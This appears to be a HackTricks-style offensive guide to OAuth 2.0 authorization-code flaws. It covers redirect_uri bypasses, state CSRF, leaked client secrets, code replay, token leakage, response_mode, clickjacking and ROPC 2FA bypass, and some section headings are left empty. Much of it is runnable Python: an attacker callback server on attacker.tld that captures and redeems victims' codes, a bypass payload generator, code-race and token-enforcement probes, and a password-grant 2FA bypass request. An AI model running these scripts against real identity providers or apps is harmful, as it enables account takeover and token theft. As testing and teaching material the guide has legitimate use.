
### Open redirect_uri <a href="#cc36" id="cc36"></a>

Per [RFC 6749 §3.1.2](https://www.rfc-editor.org/rfc/rfc6749#section-3.1.2), the authorization server should only redirect the browser to **pre-registered redirect URIs, compared with exact string matching**. Any weakness here lets an attacker send a victim through a malicious authorization URL so that the IdP delivers the victim’s `code` (and `state`) straight to an attacker-controlled endpoint, where it can be redeemed for tokens.

Typical attack workflow (a capture-and-redeem sketch follows the list):

1. Craft `https://idp.example/auth?...&redirect_uri=https://attacker.tld/callback` and send it to the victim.
2. The victim authenticates and approves the scopes.
3. The IdP redirects to `attacker.tld/callback?code=<victim-code>&state=...` where the attacker logs the request and immediately exchanges the code.
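
A minimal sketch of that workflow from the attacker side, assuming a hypothetical IdP at `idp.example`, a placeholder `client_id`, and an attacker host serving the weak `redirect_uri`:

```python
# Attacker callback: log the incoming ?code= and immediately redeem it at the token
# endpoint. Endpoint, client_id and hostnames are placeholders for the real target.
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs
import requests

TOKEN_ENDPOINT = "https://idp.example/oauth/token"   # assumed token endpoint
CLIENT_ID = "victim-app-client-id"                   # public client_id of the target app
REDIRECT_URI = "https://attacker.tld/callback"       # the weakly validated redirect_uri

class Callback(BaseHTTPRequestHandler):
    def do_GET(self):
        code = parse_qs(urlparse(self.path).query).get("code", [None])[0]
        if code:
            # Redeem the victim's code before it expires or the real client uses it.
            resp = requests.post(TOKEN_ENDPOINT, data={
                "grant_type": "authorization_code",
                "code": code,
                "redirect_uri": REDIRECT_URI,
                "client_id": CLIENT_ID,
            }, timeout=10)
            print("stolen code:", code)
            print("token response:", resp.status_code, resp.text[:200])
        # Bounce the victim somewhere plausible so nothing looks broken.
        self.send_response(302)
        self.send_header("Location", "https://victim-app.example/")
        self.end_headers()

if __name__ == "__main__":
    # Must listen on the scheme/port used in the malicious redirect_uri.
    HTTPServer(("0.0.0.0", 80), Callback).serve_forever()
```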

Common validation bugs to probe (a payload-generator sketch follows the list):

- **No validation** – any absolute URL is accepted, resulting in instant code theft.
- **Weak substring/regex checks on the host** – bypass with lookalikes such as `evilmatch.com`, `match.com.evil.com`, `match.com.mx`, `matchAmatch.com`, `evil.com#match.com`, or `match.com@evil.com` (the browser treats everything before the `@` as userinfo and navigates to `evil.com`).
- **IDN homograph mismatches** – validation happens on the punycode form (`xn--`), but the browser redirects to the Unicode domain controlled by the attacker.
- **Arbitrary paths on an allowed host** – pointing `redirect_uri` to `/openredirect?next=https://attacker.tld` or any XSS/user-content endpoint leaks the code either through chained redirects, Referer headers, or injected JavaScript.
- **Directory constraints without normalization** – patterns like `/oauth/*` can be bypassed with `/oauth/../anything`.
- **Wildcard subdomains** – accepting `*.example.com` means any takeover (dangling DNS, S3 bucket, etc.) immediately yields a valid callback.
- **Non-HTTPS callbacks** – letting `http://` URIs through gives network attackers (Wi-Fi, corporate proxy) the opportunity to snatch the code in transit.
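
A small payload generator covering the bypass classes above, assuming `match.com/callback` is the registered URI and `attacker.tld` is attacker-controlled; paste each candidate into `redirect_uri` and note which ones the IdP accepts:

```python
# Candidate redirect_uri values for the validation bugs listed above. Hostnames are
# placeholders: match.com stands for the allowed host, attacker.tld for yours.
from urllib.parse import quote

ATTACKER = "attacker.tld"

candidates = [
    f"https://{ATTACKER}/callback",                                # no validation at all
    f"https://match.com.{ATTACKER}/callback",                      # host prefix/substring check
    "https://evilmatch.com/callback",                              # "contains match.com" check
    f"https://match.com@{ATTACKER}/callback",                      # userinfo trick
    f"https://{ATTACKER}/callback#match.com",                      # fragment confuses naive parsing
    "https://match.com/openredirect?next=https://attacker.tld/",   # open redirect on allowed host
    "https://match.com/oauth/../anything",                         # path traversal past /oauth/*
    "https://takeover-me.match.com/callback",                      # wildcard subdomain
    "http://match.com/callback",                                   # HTTP downgrade
]

for c in candidates:
    print(f"&redirect_uri={quote(c, safe='')}")
```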

Also review auxiliary redirect-style parameters (`client_uri`, `policy_uri`, `tos_uri`, `initiate_login_uri`, etc.) and the OpenID discovery document (`/.well-known/openid-configuration`) for additional endpoints that might inherit the same validation bugs.
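
A quick fetch of the discovery document enumerates the endpoints and registration options worth re-testing (the issuer URL below is a placeholder):

```python
# Pull /.well-known/openid-configuration and print the fields that matter for
# redirect-validation and dynamic-registration testing. Issuer is a placeholder.
import requests

issuer = "https://idp.example"
conf = requests.get(f"{issuer}/.well-known/openid-configuration", timeout=10).json()

for key in ("authorization_endpoint", "token_endpoint", "registration_endpoint",
            "request_uri_parameter_supported", "require_request_uri_registration"):
    print(f"{key}: {conf.get(key)}")

# If registration_endpoint is open, try registering a client whose client_uri,
# policy_uri, tos_uri or initiate_login_uri point at attacker-controlled hosts and
# check whether the consent screen or login flow will link/redirect to them.
```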

### XSS in redirect implementation <a href="#bda5" id="bda5"></a>


### CSRF - Improper handling of state parameter <a href="#bda5" id="bda5"></a>

The `state` parameter is the Authorization Code flow CSRF token: the client must generate a **cryptographically random value per browser instance**, persist it somewhere only that browser can read (cookie, local storage, etc.), send it in the authorization request, and reject any response that does not return the same value. Whenever the value is static, predictable, optional, or not tied to the user’s session, the attacker can finish their own OAuth flow, capture the final `?code=` request (without sending it), and later coerce a victim browser into replaying that request so the victim account becomes linked to the attacker’s identity provider profile.

The replay pattern is always the same (a correct-handling sketch follows the list):

1. The attacker authenticates against the IdP with their account and intercepts the last redirect containing `code` (and any `state`).
2. They drop that request, keep the URL, and later abuse any CSRF primitive (link, iframe, auto-submitting form) to force the victim browser to load it.
3. If the client does not enforce `state`, the application consumes the attacker’s authorization result and logs the attacker into the victim’s app account.
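
For contrast, a minimal sketch of what correct `state` handling looks like in a relying party (a hypothetical Flask client against a hypothetical IdP); anything the target does differently is worth probing:

```python
# Correct client-side state handling: fresh entropy per login attempt, stored in the
# user's session, compared in constant time on the callback. Endpoints/IDs are placeholders.
import hmac
import secrets

from flask import Flask, abort, redirect, request, session

app = Flask(__name__)
app.secret_key = secrets.token_bytes(32)

AUTHORIZE = "https://idp.example/auth"
CLIENT_ID = "client-id"
REDIRECT_URI = "https://app.example/callback"

@app.route("/login")
def login():
    state = secrets.token_urlsafe(32)          # cryptographically random, per attempt
    session["oauth_state"] = state
    return redirect(
        f"{AUTHORIZE}?response_type=code&client_id={CLIENT_ID}"
        f"&redirect_uri={REDIRECT_URI}&scope=openid&state={state}"
    )

@app.route("/callback")
def callback():
    expected = session.pop("oauth_state", None)  # single use
    returned = request.args.get("state", "")
    # Missing, reused or mismatched state kills the CSRF replay described above.
    if not expected or not hmac.compare_digest(expected, returned):
        abort(403)
    return f"would now exchange {request.args.get('code')} server-side"
```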

The same account-linking CSRF also affects third-party integrations (Slack, Stripe, PayPal connectors and similar), where it lets attackers redirect notifications or payments to accounts they control.
A practical checklist for `state` handling during tests (a quick staticness probe follows the list):

- **Missing `state` entirely** – if the parameter never appears, the whole login is CSRFable.
- **`state` not required** – remove it from the initial request; if the IdP still issues codes that the client accepts, the defense is opt-in.
- **Returned `state` not validated** – tamper with the value in the response (Burp, MITM proxy). Accepting mismatched values means the stored token is never compared.
- **Predictable or purely data-driven `state`** – many apps stuff redirect paths or JSON blobs into `state` without mixing in randomness, letting attackers guess valid values and replay flows. Always prepend/append strong entropy before encoding data.
- **`state` fixation** – if the app lets users supply the `state` value (e.g., via crafted authorization URLs) and reuses it throughout the flow, an attacker can lock in a known value and reuse it across victims.
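
A quick probe for static or low-entropy `state` values, assuming the app exposes a login-initiation endpoint that 302s to the IdP (the URL below is a placeholder):

```python
# Trigger the "login with IdP" endpoint twice and compare the generated state values.
# LOGIN_INIT is a placeholder for the endpoint that redirects to the authorization URL.
import requests
from urllib.parse import urlparse, parse_qs

LOGIN_INIT = "https://app.example/login/idp"

def grab_state():
    r = requests.get(LOGIN_INIT, allow_redirects=False, timeout=10)
    loc = r.headers.get("Location", "")
    return parse_qs(urlparse(loc).query).get("state", [None])[0]

s1, s2 = grab_state(), grab_state()
print("state #1:", s1)
print("state #2:", s2)
if s1 is None:
    print("[!] no state parameter at all")
elif s1 == s2:
    print("[!] static state - the flow is CSRFable/replayable")
elif len(s1) < 16:
    print("[!] suspiciously short state - likely guessable")
```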

PKCE can complement `state` (especially for public clients) by binding the authorization code to a code verifier, but web clients must still track `state` to prevent cross-user CSRF/account-linking bugs.
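
For reference, the standard S256 derivation that PKCE adds on top of `state` (RFC 7636):

```python
# code_verifier stays on the client instance; only its SHA-256 challenge travels in the
# authorization request, so a stolen code is useless without the matching verifier.
import base64
import hashlib
import secrets

code_verifier = base64.urlsafe_b64encode(secrets.token_bytes(32)).rstrip(b"=").decode()
code_challenge = base64.urlsafe_b64encode(
    hashlib.sha256(code_verifier.encode()).digest()
).rstrip(b"=").decode()

print(f"authorize with: &code_challenge={code_challenge}&code_challenge_method=S256")
print(f"redeem with   : &code_verifier={code_verifier}")
```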

### Pre Account Takeover <a href="#ebe4" id="ebe4"></a>


### Disclosure of Secrets <a href="#e177" id="e177"></a>

The `client_id` is intentionally public, but the **`client_secret` must never be recoverable by end users**. Authorization Code deployments that embed the secret in **mobile APKs, desktop clients, or single-page apps** effectively hand that credential to anyone who can download the package. Always inspect public clients by:

- Unpacking the APK/IPA, desktop installer, or Electron app and grepping for `client_secret`, Base64 blobs that decode to JSON, or hard-coded OAuth endpoints.
- Reviewing bundled config files (plist, JSON, XML) or decompiled strings for client credentials.
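
A rough grep for embedded credentials in an unpacked bundle; the patterns are heuristics, so expect to tune them per target:

```python
# Walk an unpacked APK/IPA/Electron directory and flag strings that look like OAuth
# client secrets or generic API keys. Pass the extraction directory as argv[1].
import re
import sys
from pathlib import Path

PATTERNS = [
    re.compile(rb"client_secret[\"'=:\s]{1,5}([A-Za-z0-9._\-]{16,})", re.I),
    re.compile(rb"(?:secret|api[_-]?key)[\"'=:\s]{1,5}([A-Za-z0-9._\-]{20,})", re.I),
]

root = Path(sys.argv[1] if len(sys.argv) > 1 else ".")
for path in root.rglob("*"):
    if not path.is_file() or path.stat().st_size > 5_000_000:
        continue
    data = path.read_bytes()
    for pat in PATTERNS:
        for m in pat.finditer(data):
            print(f"{path}: {m.group(0)[:80]!r}")
```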

Once the attacker extracts the secret they only need to steal any victim authorization `code` (via a weak `redirect_uri`, logs, etc.) to hit `/token` independently and mint access/refresh tokens without involving the legitimate app. Treat public/native clients as **incapable of holding secrets**: they should rely on PKCE (RFC 7636) to prove possession of a per-instance code verifier rather than on a static secret. During testing, confirm whether PKCE is mandatory and whether the backend actually rejects token exchanges that omit either the `client_secret` **or** a valid `code_verifier`.
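
A sketch of that last check against a hypothetical token endpoint: replay a captured `code` with different credential combinations and compare the answers (ideally use a fresh code per attempt, since a compliant server consumes it on first use):

```python
# Does /token really enforce a client_secret or a PKCE verifier? Endpoint, client and
# code values are placeholders captured during the engagement.
import requests

TOKEN = "https://idp.example/oauth/token"
base = {
    "grant_type": "authorization_code",
    "code": "CAPTURED_CODE_HERE",
    "redirect_uri": "https://app.example/callback",
    "client_id": "client-id",
}

attempts = [
    ("no secret, no verifier", {}),
    ("bogus code_verifier", {"code_verifier": "A" * 43}),        # success => PKCE not checked
    ("leaked/guessed client_secret", {"client_secret": "LEAKED_SECRET_HERE"}),
]

for label, extra in attempts:
    r = requests.post(TOKEN, data={**base, **extra}, timeout=10)
    print(f"{label:30s} -> {r.status_code} {r.text[:120]}")
# Any 200 without a client_secret or a valid code_verifier means a stolen code alone
# is enough to mint tokens.
```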

### Client Secret Bruteforce


### Access Token Stored in Browser History

The core guarantee of the Authorization Code grant is that **access tokens never reach the resource owner’s browser**. When implementations leak tokens client-side, any minor bug (XSS, Referer leak, proxy logging) becomes instant account compromise. Always check for:

- **Tokens in URLs** – if `access_token` appears in the query/fragment, it lands in browser history, server logs, analytics, and Referer headers sent to third parties.
- **Tokens transiting untrusted middleboxes** – returning tokens over HTTP or through debugging/corporate proxies lets network observers capture them directly.
- **Tokens stored in JavaScript state** – React/Vue stores, global variables, or serialized JSON blobs expose tokens to every script on the origin (including XSS payloads or malicious extensions).
- **Tokens persisted in Web Storage** – `localStorage`/`sessionStorage` retain tokens long after logout on shared devices and are script-accessible.

Any of these findings usually upgrades otherwise “low” bugs (like a CSP bypass or DOM XSS) into full API takeover because the attacker can simply read and replay the leaked bearer token.
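
One way to hunt for these leaks during a test is to export the proxied traffic (e.g. a Burp/ZAP HAR file, path assumed below) and grep URLs and headers for bearer-token shapes:

```python
# Scan a HAR export for access tokens leaking into URLs or request headers.
# The JWT-style regex is an assumption; adapt it to the IdP's token format.
import json
import re
import sys

TOKEN_RE = re.compile(
    r"access_token=[\w.~+/-]+|eyJ[\w-]{10,}\.[\w-]{10,}\.[\w-]{10,}"
)

har_path = sys.argv[1] if len(sys.argv) > 1 else "capture.har"
with open(har_path) as f:
    har = json.load(f)

for entry in har["log"]["entries"]:
    req = entry["request"]
    spots = [("url", req["url"])] + [(h["name"], h["value"]) for h in req.get("headers", [])]
    for where, value in spots:
        for m in TOKEN_RE.finditer(value):
            print(f"[leak] {where}: {m.group(0)[:60]}...  ({req['url'][:80]})")
```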

### Everlasting Authorization Code

Authorization codes must be **short-lived, single-use, and replay-aware**. When assessing a flow, capture a `code` and:

- **Test the lifetime** – RFC 6749 recommends a maximum code lifetime of around 10 minutes. Redeem the code well after that (e.g. 15–30 minutes later); if it still works, the exposure window for any leaked code is excessive.
- **Test sequential reuse** – send the same `code` twice. If the second request yields another token, attackers can clone sessions indefinitely.
- **Test concurrent redemption/race conditions** – fire two token requests in parallel (Burp Intruder, Turbo Intruder). Weak issuers sometimes grant both.
- **Observe replay handling** – a reuse attempt should not only fail but also revoke any tokens already minted from that code. Otherwise, a detected replay leaves the attacker’s first token active.

Combining a replay-friendly code with any `redirect_uri` or logging bug allows persistent account access even after the victim completes the legitimate login.
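
A sketch of the reuse and race checks against a hypothetical token endpoint (capture a fresh `code` first; client values are placeholders):

```python
# Redeem the same authorization code twice in parallel, then once more sequentially.
# A well-behaved server grants at most one token and revokes it on replay.
import concurrent.futures
import requests

TOKEN = "https://idp.example/oauth/token"
data = {
    "grant_type": "authorization_code",
    "code": "CAPTURED_CODE_HERE",
    "redirect_uri": "https://app.example/callback",
    "client_id": "client-id",
    "client_secret": "client-secret",
}

def redeem():
    r = requests.post(TOKEN, data=data, timeout=10)
    return r.status_code, r.text[:80]

with concurrent.futures.ThreadPoolExecutor(max_workers=2) as ex:
    print("race  :", list(ex.map(lambda _: redeem(), range(2))))

print("replay:", redeem())
```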

### Authorization/Refresh Token not bound to client

### AWS Cognito

With a leaked Cognito **access token** an attacker can modify the victim's user attributes directly, e.g. with `aws cognito-idp update-user-attributes --region us-east-1 --access-token <access_token> ...`.

For more detailed info about how to abuse AWS Cognito check [AWS Cognito - Unauthenticated Enum Access](https://cloud.hacktricks.wiki/en/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.html).

### Abusing other Apps tokens <a href="#bda5" id="bda5"></a>

### response_mode

As [**explained in this video**](https://www.youtube.com/watch?v=n9x7_J_a_7Q), it may be possible to indicate where to deliver the resulting `code` with the `response_mode` parameter:
- `response_mode=form_post` -> The code is delivered in an auto-submitted POST form, inside an input named `code`.
- `response_mode=web_message` -> The code is sent in a post message: `window.opener.postMessage({"code": "asdasdasd...`
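
A quick way to compare delivery channels is to issue the same authorization request once per `response_mode` (endpoint and client values below are placeholders) and watch where the `code` lands:

```python
# Build one authorization URL per response_mode and observe how the code comes back
# (query string, fragment, auto-submitted POST form, or postMessage).
from urllib.parse import urlencode

BASE = "https://idp.example/auth"        # placeholder authorization endpoint
params = {
    "response_type": "code",
    "client_id": "client-id",
    "redirect_uri": "https://app.example/callback",
    "scope": "openid",
    "state": "test",
}

for mode in ("query", "fragment", "form_post", "web_message"):
    print(f"[{mode}] {BASE}?{urlencode({**params, 'response_mode': mode})}")
# web_message delivery is only safe if the IdP pins the postMessage target origin;
# a missing or loose origin check lets a malicious opener read the code.
```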

### Clickjacking OAuth consent dialogs

OAuth consent/login dialogs are ideal clickjacking targets: if they can be framed, an attacker can overlay custom graphics, hide the real buttons, and trick users into approving dangerous scopes or linking accounts. Build PoCs that:

1. Load the IdP authorization URL inside an `<iframe sandbox="allow-forms allow-scripts allow-same-origin">`.
2. Use absolute positioning/opacity tricks to align fake buttons with the hidden **Allow**/**Approve** controls.
3. Optionally pre-fill parameters (scopes, redirect URI) so the stolen approval immediately benefits the attacker.

During testing verify that IdP pages emit either `X-Frame-Options: DENY/SAMEORIGIN` or a restrictive `Content-Security-Policy: frame-ancestors 'none'`. If neither is present, demonstrate the risk with tooling like [NCC Group’s clickjacking PoC generator](https://github.com/nccgroup/clickjacking-poc) and record how easily a victim authorizes the attacker’s app. For additional payload ideas see [Clickjacking](clickjacking.md).
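
Before investing in a full overlay PoC, a header check like the one below (authorization URL is a placeholder) confirms whether the consent page is framable at all:

```python
# Fetch the authorization page and check for anti-framing headers.
# The URL and client parameters are placeholders for the real IdP.
import requests

auth_url = (
    "https://idp.example/auth?response_type=code&client_id=client-id"
    "&redirect_uri=https://app.example/callback&scope=openid&state=x"
)

r = requests.get(auth_url, timeout=10)
xfo = r.headers.get("X-Frame-Options", "")
csp = r.headers.get("Content-Security-Policy", "")

print("X-Frame-Options :", xfo or "<missing>")
print("frame-ancestors :", "present" if "frame-ancestors" in csp.lower() else "<missing>")
if not xfo and "frame-ancestors" not in csp.lower():
    print("[!] consent page is likely framable - build the clickjacking PoC")
else:
    print("framing appears blocked")
```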

### OAuth ROPC flow - 2 FA bypass <a href="#b440" id="b440"></a>

According to [**this blog post**](https://cybxis.medium.com/a-bypass-on-gitlabs-login-email-verification-via-oauth-ropc-flow-e194242cad96), the ROPC grant is an OAuth flow that allows logging in with just a **username** and **password**. If this simple flow returns a **token** with access to all the actions the user can perform, it's possible to bypass 2FA using that token.
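
A sketch of the ROPC probe against a hypothetical token endpoint; a token coming back without any second-factor challenge confirms the bypass:

```python
# grant_type=password request: username/password only, no interactive login, no 2FA.
# Endpoint, client and credentials are placeholders.
import requests

r = requests.post("https://idp.example/oauth/token", data={
    "grant_type": "password",
    "username": "victim@example.com",
    "password": "KnownOrPhishedPassword",
    "client_id": "first-party-client",
    "scope": "openid profile api",
}, timeout=10)

print(r.status_code, r.text[:200])
# A 200 with an access_token here, despite 2FA being enabled on the account,
# demonstrates the bypass.
```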

## References
- [**https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1**](https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1)
- [**https://portswigger.net/research/hidden-oauth-attack-vectors**](https://portswigger.net/research/hidden-oauth-attack-vectors)
- [**https://blog.doyensec.com/2025/01/30/oauth-common-vulnerabilities.html**](https://blog.doyensec.com/2025/01/30/oauth-common-vulnerabilities.html)
- [**An Offensive Guide to the OAuth 2.0 Authorization Code Grant**](https://www.nccgroup.com/research-blog/an-offensive-guide-to-the-authorization-code-grant/)

{{#include ../banners/hacktricks-training.md}}